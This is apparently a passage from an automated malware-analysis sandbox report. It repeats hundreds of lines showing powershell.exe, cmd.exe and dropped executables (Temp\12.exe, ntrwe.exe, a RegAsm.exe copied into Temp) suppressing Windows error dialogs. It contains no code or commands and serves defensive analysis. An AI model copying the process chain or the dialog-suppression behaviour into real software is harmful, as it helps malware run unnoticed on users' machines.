                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
